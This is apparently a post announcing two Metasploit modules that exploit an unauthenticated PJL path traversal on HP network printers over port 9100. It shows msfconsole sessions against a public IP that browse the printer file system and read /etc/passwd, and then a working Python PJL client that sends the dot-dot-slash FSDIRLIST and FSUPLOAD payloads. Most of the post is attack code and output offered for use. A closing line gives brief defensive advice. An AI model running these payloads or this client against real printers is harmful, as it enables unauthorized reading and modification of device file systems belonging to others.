[Metasploit] New Modules: hp_printer_pjl_traversal & hp_printer_pjl_cmd
http://www.exploit-db.com/exploits/17635/
http://www.exploit-db.com/exploits/17636/
_____________________________________________________
_____________________________________________________
hp_printer_pjl_traversal:
This module exploits a path traversal issue in possibly all HP network-enabled printer series, especially those that expose the Printer Job Language (PJL) command interface through the default JetDirect port 9100. Port 9100 is the raw-print port and accepts PJL without any authentication, so the file system commands are reachable by anyone who can open a TCP connection to the printer. With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified.
msf auxiliary(hp_printer_pjl_traversal) > show options

Module options (auxiliary/admin/hp_printer_pjl_traversal):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   INTERACTIVE  true             no        Enter interactive mode [msfconsole Only]
   RHOST        202.138.16.21    yes       The target address
   RPATH        /hp              yes       The remote filesystem path to browse or read
   RPORT        9100             yes       The target port

msf auxiliary(hp_printer_pjl_traversal) > set RPATH /
RPATH => /
msf auxiliary(hp_printer_pjl_traversal) > run

[*] Entering interactive mode
[*] cd / ...
[+] Server returned the following response:
. TYPE=DIR
.. TYPE=DIR
bin TYPE=DIR
usr TYPE=DIR
etc TYPE=DIR
hpmnt TYPE=DIR
hp TYPE=DIR
lib TYPE=DIR
dev TYPE=DIR
init TYPE=FILE SIZE=9016
.profile TYPE=FILE SIZE=834
tmp TYPE=DIR

[*] Current RPATH: /
[*] -> 'quit' to exit
[*] -> '/' to return to file system root
[*] -> '..' to move up to one directory
[*] -> '!r FILE' to read FILE on current directory
[*] Enter RPATH:
$ > hp
[*] cd /hp ...
[+] Server returned the following response:
. TYPE=DIR
.. TYPE=DIR
app TYPE=DIR
lib TYPE=DIR
bin TYPE=DIR
webServer TYPE=DIR
images TYPE=DIR
DemoPage TYPE=DIR
loc TYPE=DIR
AsianFonts TYPE=DIR
data TYPE=DIR
etc TYPE=DIR
lrt TYPE=DIR

[*] Current RPATH: /hp
[*] -> 'quit' to exit
[*] -> '/' to return to file system root
[*] -> '..' to move up to one directory
[*] -> '!r FILE' to read FILE on current directory
[*] Enter RPATH:
$ > webServer/config
[*] cd /hp/webServer/config ...
[+] Server returned the following response:
. TYPE=DIR
.. TYPE=DIR
soe.xml TYPE=FILE SIZE=23615
version.6 TYPE=FILE SIZE=45

[*] Current RPATH: /hp/webServer/config
[*] -> 'quit' to exit
[*] -> '/' to return to file system root
[*] -> '..' to move up to one directory
[*] -> '!r FILE' to read FILE on current directory
[*] Enter RPATH:
$ > !r version.6
[*] cat /hp/webServer/config/version.6 ...
[+] Server returned the following response:
WebServer directory version. Do not delete!

[*] Current RPATH: /hp/webServer/config
[*] -> 'quit' to exit
[*] -> '/' to return to file system root
[*] -> '..' to move up to one directory
[*] -> '!r FILE' to read FILE on current directory
[*] Enter RPATH:
$ > /
[*] cd / ...
[+] Server returned the following response:
. TYPE=DIR
.. TYPE=DIR
bin TYPE=DIR
usr TYPE=DIR
etc TYPE=DIR
hpmnt TYPE=DIR
hp TYPE=DIR
lib TYPE=DIR
dev TYPE=DIR
init TYPE=FILE SIZE=9016
.profile TYPE=FILE SIZE=834
tmp TYPE=DIR

[*] Current RPATH: /
[*] -> 'quit' to exit
[*] -> '/' to return to file system root
[*] -> '..' to move up to one directory
[*] -> '!r FILE' to read FILE on current directory
[*] Enter RPATH:
$ > !r etc/passwd
[*] cat /etc/passwd ...
[+] Server returned the following response:
root::0:0::/:/bin/dlsh

[*] Current RPATH: /
[*] -> 'quit' to exit
[*] -> '/' to return to file system root
[*] -> '..' to move up to one directory
[*] -> '!r FILE' to read FILE on current directory
[*] Enter RPATH:
$ > quit
[*] Exited ... Have fun with your Printer!
[*] Auxiliary module execution completed
hp_printer_pjl_cmd:
This module acts as an HP printer PJL (Printer Job Language) query tool that allows you to submit your own PJL commands. Valid PJL commands are required to get a successful response; see the reference section for the PJL reference guides from HP. The transcript below shows the two file system commands the traversal module is built on: FSUPLOAD reads a file from the printer, and FSDIRLIST lists a directory, each with a "0:/../../../" prefix that escapes the PJL volume into the underlying file system.

msf auxiliary(hp_printer_pjl_cmd) > run

[*] Entering interactive mode ...
[*] Please wait while executing -
[*] FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=999
[+] Server returned the following response:
root::0:0::/:/bin/dlsh

[*] Enter PJL Command:
[*] -> 'quit' to exit
$ > fsdirlist name="0:/../../../" entry=1 count=99999999
[*] Please wait while executing -
[*] fsdirlist name="0:/../../../" entry=1 count=99999999
[+] Server returned the following response:
. TYPE=DIR
.. TYPE=DIR
bin TYPE=DIR
usr TYPE=DIR
etc TYPE=DIR
hpmnt TYPE=DIR
hp TYPE=DIR
lib TYPE=DIR
dev TYPE=DIR
init TYPE=FILE SIZE=9016
.profile TYPE=FILE SIZE=834
tmp TYPE=DIR

[*] Enter PJL Command:
[*] -> 'quit' to exit
$ > quit
[*] Exited ... Have fun with your Printer!
[*] Auxiliary module execution completed
msf auxiliary(hp_printer_pjl_cmd) >
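To show what the two modules above actually put on the wire, here is a small stand-alone PJL client written for this page; it is an added example, not code from the Metasploit modules or from HP. It builds the same FSDIRLIST and FSUPLOAD commands with the dot-dot-slash volume prefix, wraps them in the PJL Universal Exit Language (UEL) sequence that port 9100 expects, and parses the replies. The sample replies embedded at the bottom are constructed from the listing shown in the transcript; the exact reply header layout ("@PJL FSUPLOAD FORMAT:BINARY ... SIZE=n" followed by the data, and a trailing form feed) is assumed from the HP PJL reference and may vary between firmware versions. The function and constant names are this example's own.

```python
import re
import socket

# Universal Exit Language: the escape that switches a JetDirect port into PJL mode.
UEL = b"\x1b%-12345X"


def pjl_job(*commands):
    """Wrap one or more PJL command lines in UEL markers, as sent to port 9100."""
    body = b"".join(b"@PJL " + c.encode("ascii") + b"\r\n" for c in commands)
    return UEL + body + UEL


def fsdirlist_cmd(path, entry=1, count=99999999):
    """Directory listing command; the huge COUNT mirrors the module's 'list everything'."""
    return 'FSDIRLIST NAME="%s" ENTRY=%d COUNT=%d' % (path, entry, count)


def fsupload_cmd(path, offset=0, size=999):
    """File read command (FSUPLOAD uploads from the printer to the client)."""
    return 'FSUPLOAD NAME="%s" OFFSET=%d SIZE=%d' % (path, offset, size)


def traversal_path(volume, target):
    """Build the dot-dot-slash payload: PJL volume plus '../' hops to an absolute target.
    Three hops are enough in practice because '..' at the real root collapses to '/'."""
    return volume + "/" + "../" * 3 + target.lstrip("/")


# One listing entry per line: "<name> TYPE=DIR" or "<name> TYPE=FILE SIZE=<n>".
ENTRY_RE = re.compile(r"^(?P<name>\S+)\s+TYPE=(?P<type>DIR|FILE)(?:\s+SIZE=(?P<size>\d+))?\s*$")


def parse_fsdirlist(response):
    """Parse an FSDIRLIST reply into (name, type, size) tuples; size is None for DIRs."""
    if isinstance(response, bytes):
        response = response.decode("latin-1")
    entries = []
    for line in response.replace("\r", "").split("\n"):
        m = ENTRY_RE.match(line.strip("\x0c "))  # strip the terminating form feed
        if m:
            size = int(m.group("size")) if m.group("size") else None
            entries.append((m.group("name"), m.group("type"), size))
    return entries


def parse_fsupload(response_bytes):
    """Split an FSUPLOAD reply into its status header and exactly SIZE bytes of content."""
    header, _, rest = response_bytes.partition(b"\r\n")
    m = re.search(rb"SIZE=(\d+)", header)
    if not m:
        raise ValueError("no FSUPLOAD header in reply: %r" % header[:80])
    return header.decode("latin-1"), rest[: int(m.group(1))]


def query(host, cmd, port=9100, timeout=5.0):
    """Send one PJL command to a real printer and return the raw reply (not run offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(pjl_job(cmd))
        chunks = []
        while True:
            try:
                data = s.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
            if data.endswith(b"\x0c"):  # form feed marks the end of a PJL reply
                break
    return b"".join(chunks)


# Constructed sample replies, modelled on the listing in the transcript above.
SAMPLE_DIRLIST = (
    b'@PJL FSDIRLIST NAME="0:/../../../" ENTRY=1\r\n'
    b". TYPE=DIR\r\n.. TYPE=DIR\r\nbin TYPE=DIR\r\netc TYPE=DIR\r\n"
    b"init TYPE=FILE SIZE=9016\r\n.profile TYPE=FILE SIZE=834\r\n\x0c"
)
SAMPLE_UPLOAD = (
    b'@PJL FSUPLOAD FORMAT:BINARY NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=23\r\n'
    b"root::0:0::/:/bin/dlsh\n\x0c"
)

if __name__ == "__main__":
    print(pjl_job(fsdirlist_cmd(traversal_path("0:", "/"))))
    for name, kind, size in parse_fsdirlist(SAMPLE_DIRLIST):
        print("%-10s %-4s %s" % (name, kind, size if size is not None else ""))
    print(parse_fsupload(SAMPLE_UPLOAD)[1].decode())
```

Against a live device you would replace the constructed samples with `query("printer", fsupload_cmd(traversal_path("0:", "/etc/passwd")))`. Note that FSUPLOAD returns at most SIZE bytes from OFFSET, so reading a file larger than 999 bytes means looping over offsets; the module's "!r FILE" does the same thing behind the scenes. The fix on the defensive side is not in the client: block or ACL port 9100 at the printer and on the network, and disable PJL file system access where the firmware allows it.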